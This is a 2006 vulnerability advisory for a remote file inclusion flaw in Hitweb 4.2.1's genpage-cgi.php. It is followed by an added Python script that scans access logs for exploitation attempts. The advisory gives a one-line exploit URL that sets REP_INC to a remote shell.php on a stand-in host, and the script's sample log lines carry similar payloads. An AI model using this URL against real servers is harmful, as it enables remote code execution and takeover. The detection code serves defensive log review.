# Title : Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability
# Published : 2006-08-08
# Author : Drago84
Hitweb 4.2 Remote Include File
CreW: ToxiC
Bug Found By Drago84
Source Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz
Problem is:
include "$REP_INC/lib_database.php";
Page:
genpage-cgi.php
Patch:
Declare $REP_INC
Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?
Greatz:Str0ke
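
For defenders checking web server logs for this issue, the following added example (not part of the original advisory or of Hitweb) flags requests to genpage-cgi.php that supply REP_INC in the query string and marks those whose value points at a remote resource. The access-log format, the sample entries and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Values that make PHP's include read from outside the local filesystem.
REMOTE = re.compile(r'^\s*(?:(?:https?|ftps?|php)://|data:)', re.I)

# Constructed sample entries (documentation IP ranges, .example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2006:10:00:01 +0000] "GET /dir_hitweb/genpage-cgi.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Aug/2006:10:02:13 +0000] "GET /dir_hitweb/genpage-cgi.php?REP_INC=http://remote.example/x.txt? HTTP/1.0" 200 311',
    '198.51.100.7 - - [08/Aug/2006:10:02:40 +0000] "GET /dir_hitweb/genpage-cgi.php?REP_INC=hTTp%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.0" 200 311',
    '192.0.2.44 - - [08/Aug/2006:10:05:00 +0000] "GET /dir_hitweb/genpage-cgi.php?REP_INC=include HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Aug/2006:10:06:00 +0000] "GET /dir_hitweb/index.php?ref=http://search.example/ HTTP/1.1" 200 900',
]


def find_rep_inc_requests(lines, script="genpage-cgi.php", param="REP_INC"):
    """Return (line_no, client, kind, value) for each request that sets `param`."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        try:
            url = urlsplit(match.group("target"))
        except ValueError:  # malformed request target, nothing to parse
            continue
        if not url.path.endswith("/" + script):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name != param:  # PHP variable names are case-sensitive
                continue
            value = unquote(value)  # second pass catches double encoding
            kind = "remote" if REMOTE.match(value) else "local-override"
            hits.append((line_no, line.split()[0], kind, value))
    return hits


if __name__ == "__main__":
    for hit in find_rep_inc_requests(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Access logs record only the query string, so a value supplied in a POST body or a cookie will not show up in this check.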